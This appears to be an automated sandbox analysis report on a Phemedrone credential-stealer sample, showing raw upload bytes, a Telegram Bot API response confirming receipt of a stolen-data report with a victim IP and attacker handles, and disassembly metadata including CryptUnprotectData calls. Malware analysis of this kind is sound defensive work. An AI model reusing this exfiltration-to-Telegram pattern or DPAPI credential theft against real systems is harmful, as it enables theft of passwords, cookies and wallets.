                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: 7e e5 4b 0c f4 2d 84 21 f9 ba 85 ab b6 3e 5b ab 50 7d f1 83 e1 3e 20 23 7e 05 d7 e1 b5 4f 86 67 f1 40 c2 05 39 72 68 12 bb f8 e6 21 a1 1c d9 4f 44 76 e5 7f 32 e9 af b9 37 5b a7 c5 2d 56 8a 64 49 62 7f b8 ae aa 23 c3 6e 1d 39 c3 0c a1 12 0b ec d7 59 38 93 96 87 35 f3 b2 70 19 97 e0 db 63 6a a2 6a 2e bf 98 ec 57 33 89 c9 13 d2 a3 27 e2 35 e2 17 48 e1 16 07 b3 f8 ad 5f b9 2a 21 06 1b 6a 63 02 7e 0e 88 fc 13 56 15 78 8a 3b f6 bb 2a b0 1d 93 16 2f 48 b9 42 de 45 a4 9a 06 4b c8 9b a7 71 d0 d5 d1 7e 8c 68 3a b1 c2 ce cb 38 59 20 26 e3 61 0d b0 1f 4e b1 9c 9a 90 35 71 59 fc 68 fd c5 da 77 19 0b b9 32 e5 ff 02 e5 88 f9 14 f3 a5 08 31 4a c3 85 52 b1 71 4d c5 39 b1 f8 40 1f ec c1 06 4a ae 87 40 7a e3 d4 e8 c2 aa 6b 19 c5 35 1f 71 90 8e 39 3b 4a 5f c1 69 15 4b 8e 77
                                                                          Data Ascii: ~K-!>[P}> #~Og@9rh!ODv27[-VdIb#n9Y85pcjj.W3'5H_*!jc~Vx;*/HBEKq~h:8Y &aN5qYhw21JRqM9@J@zk5q9;J_iKw
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: 28 32 c3 ab aa 87 fc 2e 8c 9f 4a 73 f7 f4 07 12 26 27 f0 13 cb a6 fd e0 ad 2e a1 00 20 26 96 20 91 46 f3 a7 4a 35 3e 3a 0e 49 25 00 9a 7e 3a 82 fa 25 04 3c 96 3b 86 4f cd 59 0b 29 2c 49 3f 95 94 dc c8 a6 87 eb 67 2e 90 36 d4 df 30 26 97 87 ed 44 d7 85 f6 f7 8f e0 57 8e 2c 6b dd 0d 70 34 e6 d3 85 ba 20 6a c6 95 99 9a 88 6e 34 e4 b7 c8 36 a0 0e f2 b3 33 f4 07 44 c1 99 93 be 1d 3b 50 3d bd 61 01 92 10 5c 1b 92 6f 48 a9 d7 cc 21 2b 80 15 6c 43 c9 a3 5d 55 5d a0 9e 86 c0 14 53 56 c7 d6 2a ce ab 65 bf a5 17 f3 96 29 e6 f5 41 8a 2d e9 c6 df c5 e5 6c 10 1d 01 a3 b1 9a df e6 42 8d b1 85 53 17 b7 fb 63 dd ee 21 cf 4a 8f cc 35 d1 f3 57 69 76 87 c8 e3 da db af 23 b7 b5 95 73 8e d7 51 36 7d db 45 1c 22 b8 0b 6f 48 b0 e1 82 28 c1 d6 6d 1e 19 bd 6e 11 f2 9f d5 87 97 b8
                                                                          Data Ascii: (2.Js&'. & FJ5>:I%~:%<;OY),I?g.60&DW,kp4 jn463D;P=a\oH!+lC]U]SV*e)A-lBSc!J5Wiv#sQ6}E"oH(mn
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: d7 94 df 50 f0 5b e1 24 6a d6 c4 47 82 11 2f 20 ce f3 bc 14 91 c0 19 4d 73 05 5c 3b 59 c6 77 b9 87 27 d9 a7 e0 01 91 bd 6d eb 24 2c a3 b3 df 94 d6 b4 d2 9b 07 f3 4a d0 53 28 ed 79 33 bd 08 04 b0 dc e6 39 0d 61 49 83 a5 7b e7 70 62 56 91 2d 93 75 e3 eb 45 19 cf ae 4c 9d 78 07 64 39 da 16 b3 99 ad 71 d6 ed 49 26 cc f1 77 25 d9 17 35 dd f9 d1 28 0a f9 f2 84 cd 53 69 00 55 3f ff c7 93 1b ff 55 a1 52 09 ef 65 5a 69 13 75 d1 b4 c9 2d e5 f0 a7 88 23 bf 12 e8 29 1d a1 7e c3 8c 55 a3 d6 20 96 cb 7f bd f7 a0 bb d8 61 a2 fa 05 1d 76 ab 56 e8 19 b7 68 4c 58 32 ae 7e 84 67 3d 99 ee 84 2e 0a 22 c0 3a f0 92 1b 65 c8 1c 18 19 1f ac 25 94 b2 7b 9c 03 37 36 87 c7 36 a6 1d b8 d4 38 ca eb fd f9 b5 02 11 24 cf 55 78 fc f2 85 a0 8d 6b 87 66 f1 0b af cc e3 3f 99 e1 1b 67 ed 75
                                                                          Data Ascii: P[$jG/ Ms\;Yw'm$,JS(y39aI{pbV-uELxd9qI&w%5(SiU?UReZiu-#)~U avVhLX2~g=.":e%{7668$Uxkf?gu
                                                                          2024-10-30 21:57:02 UTC145OUTData Raw: 95 d2 31 13 ad 5f 53 77 85 a4 13 b1 b6 de ad 69 44 6f 03 9b 62 55 6e c7 0c b2 33 50 c1 a5 6a 7f b9 ad 8d 1c 16 d1 6f f8 34 a8 be 0b 4d cd 57 82 62 a4 28 2f bd 54 a8 53 07 f8 91 53 1a 13 47 fc f1 6e 99 16 84 50 2e e7 ec aa 15 2c a2 ee f4 19 f6 2a 13 dc ca d1 a8 b5 8b b1 67 b1 78 d8 44 5d 8c 1a 64 9a 03 c4 e0 71 1c e6 7b 81 c4 ef 7e 85 ea 27 eb 60 ce 40 6d 34 ce 53 8b 7e 7c 95 9b 0e 76 ea 8d 58 90 ac 38 a2 f9 31 42 5f 5a b1 d0 d9 7e
                                                                          Data Ascii: 1_SwiDobUn3Pjo4MWb(/TSSGnP.,*gxD]dq{~'`@m4S~|vX81B_Z~
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: 38 72 d4 35 bc f3 10 5e 54 7c ad b4 88 fa 54 fb 9d 1a 08 0c bf ed 05 2b 25 8f f3 25 35 32 0d 53 16 4c a8 40 e0 3f 94 d0 2c 0b 5a aa c4 7d f0 5c 64 4e 68 ac 9f 41 13 86 77 38 db 07 e3 7c 68 d0 98 01 9d ce 9e 5a f4 5f a3 c2 2e 18 d8 fe d1 84 bd 80 6f 1b 3c 68 46 8d 74 04 73 a7 15 c2 a6 10 d8 03 ce 6b d9 c3 6a 96 9c b2 95 cc 12 c3 e5 e8 66 6d e3 55 23 f8 de dd 27 da ab 17 74 47 b2 5f a1 cf 3b 5d b8 a8 ec 4a 01 4c 95 c9 5d 9e 22 cb bf 80 fe b9 5e b3 94 fb a5 d4 cb 99 1e 37 10 1d 42 89 85 ec 2a d2 0d 72 a2 c1 77 a6 c6 df 5b bf d2 2c 3c 1c 17 5d 30 0e 70 80 24 2b 63 ec 9f e5 9a ae 78 01 42 c2 19 5d 98 5f 83 09 08 3d 85 ef 8f 63 90 c8 af 0d 47 7f e8 90 bd c6 fa d9 3e d2 25 7b 2e d7 91 e8 47 8b eb 7d b4 ac f2 9f 93 da 67 e0 4e 13 a5 7d 42 2c 72 27 51 36 fa 33 43
                                                                          Data Ascii: 8r5^T|T+%%52SL@?,Z}\dNhAw8|hZ_.o<hFtskjfmU#'tG_;]JL]"^7B*rw[,<]0p$+cxB]_=cG>%{.G}gN}B,r'Q63C
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: 73 c3 45 58 25 94 26 a6 28 70 c6 48 56 c6 12 46 00 41 a1 d1 ee 03 dc 2e f7 7a 50 27 38 02 38 83 3f 2e 02 b2 01 90 d4 dc 7c 8f 98 de 3a 07 1e 1d 73 6d 46 81 a6 47 41 0b 6a 63 f0 37 d6 fb c5 73 34 ed 51 bd df e5 3e dc 77 37 cf 8b 37 66 a7 7d a8 cf a1 a0 e4 f5 35 98 f7 be ca 38 ba 42 c3 3f 44 83 27 b9 37 c6 ce b0 cc 15 37 f4 cc 32 cd d2 1b bd 06 ce e9 4d 4e 0f 15 d5 83 c6 36 ea 4a 8c 32 38 80 ff 51 cb 25 68 a6 9f e2 b3 b2 6c 5d 88 91 c0 1f 6a 46 68 01 b0 7e cc 5e bf 46 4c 69 90 9a 26 d0 3e 8c 04 f3 4a fd f8 df 11 e2 44 ac 16 1d 8c ed ea ca 38 f2 2c 5d 24 e8 a5 13 08 0e 2f 94 1c 06 65 b7 cd bb a3 e1 6e 66 12 77 95 6d 91 ae 99 78 80 bc 89 6d b3 7d ea fb f8 34 a4 9d ab f3 38 7d 11 2a 7e 9f 4b d6 35 87 3e fe bb 00 fc 26 6a ca 6f de fc 40 b5 5c a8 66 69 25 23 be
                                                                          Data Ascii: sEX%&(pHVFA.zP'88?.|:smFGAjc7s4Q>w77f}58B?D'772MN6J28Q%hl]jFh~^FLi&>JD8,]$/enfwmxm}48}*~K5>&jo@\fi%#
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: 26 d7 35 9c f5 eb 9e 8b ac 8e fe d6 0d 65 30 27 dd 04 b2 44 c9 15 7e 76 38 9e 96 7e 3b ec 17 ea 59 3c 9b 56 ea 8a fc a5 3d 87 ff 39 2c a3 62 bd 47 3e cd 2b 07 d8 09 e5 07 d6 29 30 0f af bb f3 41 2c dc c2 97 8f 89 41 34 44 07 e5 51 12 c8 44 08 a9 78 0b 95 42 74 b7 4c 9d 46 36 d2 ae c2 33 d6 d3 84 23 23 74 0d 44 4f 4f 8f a0 d8 fc 46 3d 96 a6 a1 27 10 13 6e 15 26 0a 76 36 9b 03 ab 81 b2 eb 38 38 68 60 59 2a a0 11 b9 ae 4d dd ee c5 91 9c fc 16 ed 45 41 bb 06 b7 97 86 3e 80 42 80 1f 57 c3 51 7f 97 bc 14 97 0c 9b b1 6b 1c eb f6 f7 8e f7 82 76 3c 32 ca 4a 9d 13 70 3d 0f 90 f4 9d c5 44 57 d2 b8 45 22 7e a5 07 fd 0c e5 52 78 1e 9d f4 87 e2 87 be f3 c7 84 13 79 a7 11 e2 84 c7 3f 8c 9c bb d6 23 1f 1f 20 9a a5 de c6 2f 3d ed 40 a8 e2 60 ee ea 3c 76 9d 33 66 51 06 b3
                                                                          Data Ascii: &5e0'D~v8~;Y<V=9,bG>+)0A,A4DQDxBtLF63##tDOOF='n&v688h`Y*MEA>BWQkv<2Jp=DWE"~Rxy?# /=@`<v3fQ
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: 19 cb c4 1c 8a 78 e2 d3 bb 4a 32 80 63 e2 64 2a 9c 2f 29 b1 86 5c 8f 2d 60 da c7 8b 87 5c bb 71 76 8b a4 92 3f 33 58 bc b4 06 f4 08 7b 2d 1a 55 1f f4 0b 90 dc 4b 9e 55 e4 42 57 27 9f 35 b0 d0 44 bd e7 ef ca 82 21 67 99 95 71 53 bb ae 3e d7 86 9d 3a 3e eb 9d d2 a5 9c 19 35 36 b8 dd b7 51 5e c2 0a 6c 43 19 d0 0a 18 73 e1 0c 17 06 de 44 56 78 4a 8e 3b 15 ac a6 ec 53 d7 4f 59 05 11 a5 db a5 dc e0 72 d8 7e 8d 91 41 46 34 e7 40 46 2c 33 bf 51 ca e1 1f 6d e2 97 e3 77 0c e2 6b 2a ef e1 9b 77 1e e3 50 e2 d9 d3 2a d3 5e 60 8f 78 38 b7 55 bf fd a1 e8 62 24 dd c0 7e 06 1c b9 0e fa 1a 08 07 79 0f 38 cf 0a 0a b9 9c 74 65 ac b8 ce 94 5f d7 91 c3 1f ba 58 dc 43 91 b3 a9 08 5a df 01 cc 2a ea 0e b4 c4 1d 18 b1 35 6b 26 70 51 73 9e b3 81 cf 84 26 82 db 6d 5e c7 d8 3e f9 cb
                                                                          Data Ascii: xJ2cd*/)\-`\qv?3X{-UKUBW'5D!gqS>:>56Q^lCsDVxJ;SOYr~AF4@F,3Qmwk*wP*^`x8Ub$~y8te_XCZ*5k&pQs&m^>
                                                                          2024-10-30 21:57:03 UTC1287INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Wed, 30 Oct 2024 21:57:03 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 899
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          {"ok":true,"result":{"message_id":149359,"from":{"id":6217988193,"is_bot":true,"first_name":"mu9rk","username":"murk09_bot"},"chat":{"id":6065194468,"first_name":"Jacklin","last_name":"Smith","username":"richoffcrime","type":"private"},"date":1730325423,"document":{"file_name":"[US]173.254.250.78-Phemedrone-Report.phem","file_id":"BQACAgEAAxkDAAECR29nIquvCuQ3GKlJq5FFSWp5YloFJwACrAYAAq_DGEVxuNRmh7EGmjYE","file_unique_id":"AgADrAYAAq_DGEU","file_size":721824},"caption":"Phemedrone Stealer Report | by @webster480 & @TheDyer\n\n - IP: 173.254.250.78 (United States)\n - Tag: Default (Pekemum)\n - Passwords: 0\n - Cookies: 2\n - Wallets: 0\n\n\n\n\n@freakcodingspot","caption_entities":[{"offset":0,"length":25,"type":"bold"},{"offset":31,"length":11,"type":"mention"},{"offset":45,"length":8,"type":"mention"},{"offset":55,"length":108,"type":"pre"},{"offset":167,"length":16,"type":"mention"}]}}


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:17:56:52
                                                                          Start date:30/10/2024
                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0x1e393020000
                                                                          File size:141'824 bytes
                                                                          MD5 hash:CAE3F7AE06655EB93F5DFB028DDD3D6D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.3890665414.000001E394D0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:15.7%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:9.7%
                                                                            Total number of Nodes:31
                                                                            Total number of Limit Nodes:1
                                                                            execution_graph 14225 7ff848ea3e02 14227 7ff848ea3e11 CryptUnprotectData 14225->14227 14228 7ff848ea3fd9 14227->14228 14229 7ff848ea377c 14230 7ff848ea3783 14229->14230 14233 7ff848e9f600 14230->14233 14232 7ff848ea3788 14234 7ff848ea3920 14233->14234 14235 7ff848e97aa0 LoadLibraryA 14234->14235 14236 7ff848ea3939 14235->14236 14237 7ff848ea393e 14236->14237 14240 7ff848ea3988 LoadLibraryA 14236->14240 14238 7ff848e97ab0 LoadLibraryA 14237->14238 14239 7ff848ea3949 14238->14239 14239->14232 14242 7ff848ea3b1f 14240->14242 14242->14232 14204 7ff848ea9bdd 14207 7ff848ea3920 14204->14207 14206 7ff848ea9be2 14216 7ff848e97aa0 14207->14216 14209 7ff848ea3939 14210 7ff848ea393e 14209->14210 14213 7ff848ea3988 LoadLibraryA 14209->14213 14220 7ff848e97ab0 14210->14220 14212 7ff848ea3949 14212->14206 14215 7ff848ea3b1f 14213->14215 14215->14206 14217 7ff848e97aa7 LoadLibraryA 14216->14217 14219 7ff848ea3b1f 14217->14219 14219->14209 14222 7ff848e97aaa 14220->14222 14221 7ff848e97ade 14221->14212 14222->14221 14223 7ff848ea3acb LoadLibraryA 14222->14223 14224 7ff848ea3b1f 14223->14224 14224->14212

                                                                            Executed Functions

                                                                            Function 00007FF848E9E0F5 Relevance: 3.2, Strings: 1, Instructions: 1953COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0vH
                                                                            • API String ID: 0-2857910901
                                                                            • Opcode ID: ae322cd72d38721ad5484160f09a3d762262f82c0b170be43f2155d0a094f29d
                                                                            • Instruction ID: 6f50e8b5b41e62e6da4779f5d9920604fee092ef2cb3e6e4a3783cda5f4c61c3
                                                                            • Opcode Fuzzy Hash: ae322cd72d38721ad5484160f09a3d762262f82c0b170be43f2155d0a094f29d
                                                                            • Instruction Fuzzy Hash: 16D2B130A1CA4A8FE748AB68845577673D2FF95388F6400BDC54EC72D3DFB9A8428749
                                                                            Function 00007FF848EA3E02 Relevance: 1.7, APIs: 1, Instructions: 217encryptionCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1381 7ff848ea3e02-7ff848ea3e0f 1382 7ff848ea3e11-7ff848ea3e19 1381->1382 1383 7ff848ea3e1a-7ff848ea3e2b 1381->1383 1382->1383 1384 7ff848ea3e36-7ff848ea3e65 1383->1384 1385 7ff848ea3e2d-7ff848ea3e35 1383->1385 1387 7ff848ea3e67-7ff848ea3eae 1384->1387 1388 7ff848ea3eaf-7ff848ea3f1b 1384->1388 1385->1384 1387->1388 1392 7ff848ea3f1d-7ff848ea3f21 1388->1392 1393 7ff848ea3f8c-7ff848ea3fd7 CryptUnprotectData 1388->1393 1394 7ff848ea3f70-7ff848ea3f8b 1392->1394 1395 7ff848ea3f23-7ff848ea3f6a 1392->1395 1396 7ff848ea3fd9 1393->1396 1397 7ff848ea3fdf-7ff848ea401d 1393->1397 1394->1393 1395->1394 1396->1397
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CryptDataUnprotect
                                                                            • String ID:
                                                                            • API String ID: 834300711-0
                                                                            • Opcode ID: 1d7168910f16696e2ca11777a12d99803a3543e073de19eea3cd05e2f60d467b
                                                                            • Instruction ID: f70bdcf81f15be19872bcf41a6b6578bd4562b1639c2d2728bfc9794fe482b30
                                                                            • Opcode Fuzzy Hash: 1d7168910f16696e2ca11777a12d99803a3543e073de19eea3cd05e2f60d467b
                                                                            • Instruction Fuzzy Hash: 2F619F3090CA498FDB99EB18D845BE9B7F1FF55710F0442AAD40DD3292DF7469858B81
                                                                            Function 00007FF848EAE7B3 Relevance: 1.3, Instructions: 1256COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6929e6a6114920dfbe1ac30a22dbc7cef6dea5e96206d835f47c2da65b7cc698
                                                                            • Instruction ID: c12d1fda809e0c92d6c66ecf2f9cc8dd34c94bf52c7d8dcd5527b24eeedf4d6a
                                                                            • Opcode Fuzzy Hash: 6929e6a6114920dfbe1ac30a22dbc7cef6dea5e96206d835f47c2da65b7cc698
                                                                            • Instruction Fuzzy Hash: 9B926D34A0CA4A8FDF98EF28C495AA93BE1FF59740F1405B9E44EC7292CB35E845CB54
                                                                            Function 00007FF848EAB57D Relevance: 1.2, Instructions: 1249COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6bc4dcec889f5c1c20e2dc54bc987653d8c7d4aff75e4ad3bccb367ab0c6f89c
                                                                            • Instruction ID: dd875261da15982adada100c3ae1a293c1969a3f1ee3496dff313e9ff8196f6d
                                                                            • Opcode Fuzzy Hash: 6bc4dcec889f5c1c20e2dc54bc987653d8c7d4aff75e4ad3bccb367ab0c6f89c
                                                                            • Instruction Fuzzy Hash: 2582F660B2DA495FE34CB7684829A75BBD1FF99784F5404FED04EC72D3DE28A805831A
                                                                            Function 00007FF848E9CF1C Relevance: 1.1, Instructions: 1128COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dbd7cbec6fd8ab31cf44dd7ca68c21447ccfed062848f99911fb0f72f9733e05
                                                                            • Instruction ID: ae075ddfae562a0d9c2ee1bddcd7eb010f50f8ab7303360406dab70f2abed5a1
                                                                            • Opcode Fuzzy Hash: dbd7cbec6fd8ab31cf44dd7ca68c21447ccfed062848f99911fb0f72f9733e05
                                                                            • Instruction Fuzzy Hash: 95722221B1DA8A5FE389FB6844156797BD2FF99388F0401BED04EC72D7DE38A8058356
                                                                            Function 00007FF848E94F66 Relevance: .5, Instructions: 475COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 58526abb807ab39633406366c6614501e7ee0a925d5aab0a542a061e0c9f1213
                                                                            • Instruction ID: 54ba2fbb1436f137a2d6f262500804271e32b5888259c82cac0fc1de252ae8e1
                                                                            • Opcode Fuzzy Hash: 58526abb807ab39633406366c6614501e7ee0a925d5aab0a542a061e0c9f1213
                                                                            • Instruction Fuzzy Hash: C2F1D43090CA8D8FEBA8EF28D8557E93BE1FF54354F04426EE84DC7291DB7499448B82
                                                                            Function 00007FF848E95D12 Relevance: .5, Instructions: 460COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 741a12a6f5902c26da076a899fb542325a34baf7d856d0391721c3ba6da29735
                                                                            • Instruction ID: 4df4ebd7146c50a72321067445265636bee83c7706cc76bed5e4fa6f180e2592
                                                                            • Opcode Fuzzy Hash: 741a12a6f5902c26da076a899fb542325a34baf7d856d0391721c3ba6da29735
                                                                            • Instruction Fuzzy Hash: 6FE1B33090CA8D8FEBA8EF68C8567E93BD1FF54350F04426AE84DC7295DF7899458B81
                                                                            Function 00007FF848E97AA0 Relevance: 1.7, APIs: 1, Instructions: 229COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1358 7ff848e97aa0-7ff848ea3a5f 1365 7ff848ea3a61-7ff848ea3a70 1358->1365 1366 7ff848ea3aba-7ff848ea3b1d LoadLibraryA 1358->1366 1365->1366 1367 7ff848ea3a72-7ff848ea3a75 1365->1367 1373 7ff848ea3b25-7ff848ea3b61 call 7ff848ea3b7d 1366->1373 1374 7ff848ea3b1f 1366->1374 1368 7ff848ea3a77-7ff848ea3a8a 1367->1368 1369 7ff848ea3aaf-7ff848ea3ab7 1367->1369 1371 7ff848ea3a8c 1368->1371 1372 7ff848ea3a8e-7ff848ea3aa1 1368->1372 1369->1366 1371->1372 1372->1372 1375 7ff848ea3aa3-7ff848ea3aab 1372->1375 1379 7ff848ea3b63 1373->1379 1380 7ff848ea3b68-7ff848ea3b7c 1373->1380 1374->1373 1375->1369 1379->1380
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c02317e40b620403d8d0b90757bf4f14938bf3f5607c697a6e921f061e52edc1
                                                                            • Instruction ID: c6a35caed4684ae9b63fbf255b06d7362d933c2552286964d6e619105f8eda9b
                                                                            • Opcode Fuzzy Hash: c02317e40b620403d8d0b90757bf4f14938bf3f5607c697a6e921f061e52edc1
                                                                            • Instruction Fuzzy Hash: 8C61C03190CA8D8FEB98EF28D8457B57BD1FB54350F04426AE84DC3292DB74E9458B81
                                                                            Function 00007FF848EA3996 Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1403 7ff848ea3996-7ff848ea3a5f 1411 7ff848ea3a61-7ff848ea3a70 1403->1411 1412 7ff848ea3aba-7ff848ea3b1d LoadLibraryA 1403->1412 1411->1412 1413 7ff848ea3a72-7ff848ea3a75 1411->1413 1419 7ff848ea3b25-7ff848ea3b61 call 7ff848ea3b7d 1412->1419 1420 7ff848ea3b1f 1412->1420 1414 7ff848ea3a77-7ff848ea3a8a 1413->1414 1415 7ff848ea3aaf-7ff848ea3ab7 1413->1415 1417 7ff848ea3a8c 1414->1417 1418 7ff848ea3a8e-7ff848ea3aa1 1414->1418 1415->1412 1417->1418 1418->1418 1421 7ff848ea3aa3-7ff848ea3aab 1418->1421 1425 7ff848ea3b63 1419->1425 1426 7ff848ea3b68-7ff848ea3b7c 1419->1426 1420->1419 1421->1415 1425->1426
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3894239117.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e90000_file.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 1e1d32a832cc08cff073dcc48ec3e5fd6fcd95681f28cc2c86e755f4d3a96c2f
                                                                            • Instruction ID: 7c998f18a6a6552d049fe1738af63d7a182cfffd16351978389b00f95e55effe
                                                                            • Opcode Fuzzy Hash: 1e1d32a832cc08cff073dcc48ec3e5fd6fcd95681f28cc2c86e755f4d3a96c2f
                                                                            • Instruction Fuzzy Hash: 9A619430918A8C4FDB99EF2CC8557E93BE1FF59350F14426AE84EC7292DB34D9458B81